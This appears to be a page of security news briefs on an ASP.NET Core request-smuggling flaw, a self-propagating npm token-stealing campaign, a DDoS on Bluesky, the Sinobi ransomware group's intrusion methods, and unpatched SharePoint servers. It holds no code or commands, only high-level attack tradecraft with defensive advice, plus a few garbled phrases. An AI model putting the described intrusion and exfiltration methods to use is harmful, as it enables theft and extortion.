Trending Topics

ASP NET Core Critical Vulnerability: When Request Smuggling Becomes a Security Feature Bypass

Microsoft has patched a maximum-severity vulnerability in ASP[.]NET Core, an open-source web development framework | .NET Core, tracked as CVE‑2025‑55315, that allows HTTP request smuggling via the built-in Kestrel web server. With a CVSS score of 9.9 out of 10, Microsoft calls it one of its highest-rated issues because, in the worst case, it becomes a security feature bypass that changes scope, letting a lower-privileged request effectively masquerade as a higher-privileged one. The bug arises from inconsistent interpretation of HTTP requests between Kestrel and upstream components, especially when headers like Content-Length and Transfer-Encoding are involved, allowing an attacker to smuggle a second request inside the first. For example, a public unauthenticated request can carry a hidden GET /admin request that slips past normal authentication and authorization checks if the application and any proxies do not consistently enforce boundaries. This issue affects ASP[.]NET Core, an open-source web development framework | .NET Core 8.0, 9.0, and 10.0, and the Kestrel package on 2. x. Microsoft notes that there are no general mitigating factors for the request smuggling scenario beyond patching. The actual impact depends heavily on how an application processes requests, but Microsoft and independent researchers warn that unpatched systems could be open to privilege escalation, server-side request forgery, cross-site request forgery bypass, and input validation bypass, all stemming from poisoned assumptions about which user or session a given request belongs to. Confusion around .NET 6 has also surfaced because Microsoft does not issue CVEs for end-of-life releases, yet analysis indicates that .NET 6-based apps using affected Kestrel builds remain vulnerable and require third-party or package-level fixes. To remediate, Microsoft urges developers to update to the patched ASP[.]NET Core, an open-source web development framework | .NET Core runtime and SDK versions 8, 9, or 10, or, at a minimum, to upgrade Microsoft[.]AspNetCore[.]Server[.]Kestrel[.]Core to version 2.3.6 or later, then redeploy their applications. Teams should also review and harden any reverse proxies or load balancers in front of Kestrel, ensuring they normalize HTTP requests and detect smuggling attempts rather than passing ambiguous traffic through. For security engineers, it is important to pay close attention to code that uses HttpRequest[.]Body, HttpRequest[.]BodyReader or similar mechanisms, since these are the points where smuggled data may be processed in unexpected ways. Microsoft and community researchers have released test tools and sample apps that reproduce chunked transfer and newline parsing edge cases, so teams can verify whether their builds and configurations are affected, and then validate that defenses still hold after patching.

Self-Spreading npm Attack: Malicious Packages Steal GitHub Tokens and Rewrite Your Own Projects

A newly reported npm supply chain campaign is abusing malicious JavaScript packages that not only steal GitHub and CI/CD auth tokens but also self-propagate by silently injecting themselves into other projects and repositories you work on. The attack uses packages that look like normal utilities or helpers. Once installed, they run code during npm lifecycle hooks (preinstall or postinstall), fetch a remote payload, and begin harvesting secrets and modifying local repositories without any additional action from the developer. Researchers assess that the malware performs extensive environment reconnaissance. It searches for GitHub access tokens, npm tokens, CI/CD variables, and other authentication secrets stored in files, environment variables, or config directories, then exfiltrates them to attacker-controlled servers over HTTP POST or WebSocket connections. With those tokens, the actors can clone private repositories, create new branches, and push malicious changes or workflows back to GitHub, turning the victim’s own projects into new infection vectors for teammates, customers, or downstream users. Some campaigns also add additional malicious dependencies into package[.]json so that other developers who run npm install automatically pull in and execute the same payload, which is why researchers describe it as self-spreading inside the npm ecosystem. For developers and teams, this means treating any new or little-known npm dependency as a potential supply chain risk. Defenses should include pinning dependencies, using tools that scan for known malicious packages and suspicious install scripts, and reviewing package[.]json and package-lock[.]json diffs carefully, especially in pull requests. On the credential side, move to short-lived, scoped tokens; avoid storing tokens unencrypted on developer machines; and monitor for unusual GitHub activity, such as unexpected new branches, commits from unfamiliar IPs, or changes to workflow files. If you suspect exposure, immediately revoke GitHub and npm tokens, rotate CI/CD secrets, and audit your repos for unauthorized code or workflow modifications, since the real damage is not only local compromise but the silent corruption of the software you ship to others.

Bluesky Back Online After DDoS Barrage, as Pro-Iran “313 Team” Claims the Hit

Bluesky, the decentralized social network positioned as an alternative to Twitter/X, spent roughly a day dealing with outages after a DDoS attack knocked core features offline. The disruption began late on April 15, 2026, when users saw feeds stop refreshing around 11:40 p.m. PDT and, by the following morning, notifications, search, and thread loading were all failing, leaving the platform effectively unusable for many. Bluesky later confirmed that its API, which ferries data between user devices and the backend, was being flooded with junk traffic to “jam the lines”, describing the incident as a “sophisticated DDoS attack” but emphasizing that there was no evidence of unauthorized access to private user data. By April 20, the company reported that the app had returned to a stable state after its security team contained repeated attempts by attackers to relaunch the flood. While Bluesky stopped short of naming a culprit, a pro-Iran hacktivist group known as 313 Team, also called the Islamic Cyber Resistance in Iraq, quickly claimed responsibility on Telegram and other channels. The group, which has a recent history of politically motivated DDoS and website disruption campaigns against targets it associates with the United States, Israel, and allied states, boasted that it had taken Bluesky down, and days later announced a follow-up hit on mastodon[.]social, which saw more limited impact thanks to its federated, distributed hosting model. Analysts note that 313 Team tends to chase visibility rather than deep intrusion, favoring short burst outages, screenshots, and claims of disruption over data theft, and that it has recently targeted government services in Bahrain using similar tactics. For Bluesky’s more than 43 million users, the key reassurance is that this attack was about availability, not data compromise. DDoS operations work by overwhelming public-facing services with traffic, not by breaking into databases, and Bluesky has reiterated that its monitoring has not found signs of private data exposure. At the same time, the incident underlines how social platforms and other high-profile public services are now regular fixtures in geopolitical cyber signaling, where groups like 313 Team can generate headlines and amplify narratives simply by knocking popular apps offline for a few hours. For defenders running similar platforms or APIs, this trend reinforces the need for robust DDoS mitigation, scalable API protection, and clear public communication plans, so that when traffic floods arrive, teams can keep services afloat and quickly reassure users about what was and was not affected.

Sinobi Ransomware: Exclusive RaaS Group With Nation State Style Tradecraft

Sinobi is a hybrid, semi-private RaaS operation that emerged in mid-2025 and has quickly built a reputation for quiet, high-impact intrusions against midsize and large organizations, mainly in the United States and allied countries. Instead of opening sign-ups on underground forums, the core operators work only with vetted, well-connected affiliates, many of whom already have access routes through initial access brokers, compromised managed service providers, or existing VPN/firewall exploits such as SonicWall SSL VPN vulnerabilities. Technically, Sinobi appears to be a direct successor or rebrand of the Lynx ransomware group, itself linked to earlier INC ransomware, and it uses a Babuk-derived cryptographic scheme combining Curve25519 key exchange with AES 128 CTR, which makes recovery without the attackers’ private key practically impossible. Once inside a victim network, Sinobi runs a hands-on keyboard attack chain that looks closer to high-end intrusion sets than commodity ransomware. Affiliates start with privilege escalation and security evasion, creating or hijacking local admin and domain accounts, disabling endpoint protection and logging, and establishing persistence through legitimate remote access tools. They then perform automated and manual reconnaissance to map domains, file shares, privileged accounts, endpoint security products, and, sometimes, USB devices, suggesting at least some interest in removable media-based propagation. Lateral movement relies heavily on RDP, SMB, and DCOM, using valid or newly created credentials and extensive living-off-the-land activity, which helps Sinobi blend into normal administrative traffic and delay detection until the environment is fully staged for impact. Like most modern big-game operations, Sinobi uses double extortion, exfiltrating data before encrypting systems. Affiliates typically deploy tools such as Rclone, WinSCP, or other secure file transfer clients to move large volumes of documents, databases, email archives, backups, and regulated records to attacker-controlled cloud storage or Tor infrastructure, prioritizing information that increases leverage, such as customer data and intellectual property. Only after exfiltration do they execute the Sinobi encryptor, usually during off hours, appending a “.SINOBI” like extension, deleting shadow copies and backups, terminating critical services, changing desktop wallpapers, and dropping a README-style ransom note with a Tor negotiation portal and a short payment deadline. Public casework and leak site data suggest that Sinobi has already impacted dozens of organizations across sectors such as accounting, manufacturing, and professional services, and that the group is more interested in fewer, higher-value intrusions than mass opportunistic campaigns. Sinobi is a reminder that professionalized RaaS crews now operate at maturity levels that resemble those of advanced intrusion groups, not smash-and-grab criminals. Effective mitigation starts with hardening remote access and third-party relationships: strict patching and monitoring of VPNs and edge appliances, enforcing phishing-resistant MFA, and scrutinizing MSP and vendor connectivity since those pathways have already been abused in documented cases. Inside the network, focus on credential hygiene and segmentation, restrict and monitor RDP and SMB traffic, and deploy EDR and logging tuned to detect living-off-the-land behavior, new admin account creation, Rclone or WinSCP use, and unusual data egress to cloud storage. Finally, ensure you have tested backup and recovery processes that are isolated from domain credentials and can survive shadow copy deletion, so that when a group like Sinobi does get in, you are negotiating from a position of resilience rather than desperation.

Update: Over 1,300 SharePoint Servers Still Exposed to an Actively Exploited Spoofing Zero Day

Security scans show that more than 1,300 internet-exposed Microsoft SharePoint servers remain unpatched for CVE-2026-32201, a spoofing vulnerability that Microsoft has confirmed was exploited as a zero-day and is still being abused in current attacks. The flaw affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition, and stems from improper input validation that allows an unauthenticated attacker to perform network-level spoofing in low-complexity attacks that do not require user interaction. Successful exploitation allows an unprivileged attacker to view sensitive information and modify disclosed data, undermining the confidentiality and integrity of SharePoint content and workflows, even though availability is not directly affected. Microsoft patched CVE-2026-32201 in the April 2026 Patch Tuesday release and immediately labeled it a zero-day, but has so far not shared technical exploit details or attributed it to a specific threat group. On the same day, CISA added the bug to its KEV catalog and ordered U.S. Federal Civilian Executive Branch agencies to patch all affected SharePoint servers within two weeks, by April 28, under Binding Operational Directive 22 01. Despite this, data from the Shadowserver Foundation shows that since the patches dropped, fewer than 200 servers have been updated, leaving the majority of known exposed instances still vulnerable on the public internet and providing attackers with a stable, well-understood target set. For organizations running on-premises SharePoint, the guidance is clear and urgent. Admins should identify all externally reachable SharePoint 2016, 2019, and Subscription Edition servers, apply the April 2026 security updates that include the CVE 2026 32201 fix, and, where possible, remove SharePoint from direct internet exposure by placing it behind VPN or reverse proxy layers. Security teams should also monitor for suspicious SharePoint traffic and access patterns, cross-check their environment against CISA’s KEV listing, and verify that any third-party-managed arePoint instances have been patched in accordance with guidance. Given the history of SharePoint bugs being chained with other vulnerabilities for code execution and key theft, leaving CVE 2026 32201 unpatched does not just risk spoofing on a single site; it leaves a foothold that can be combined with other flaws to compromise broader Microsoft 365 integrated environments.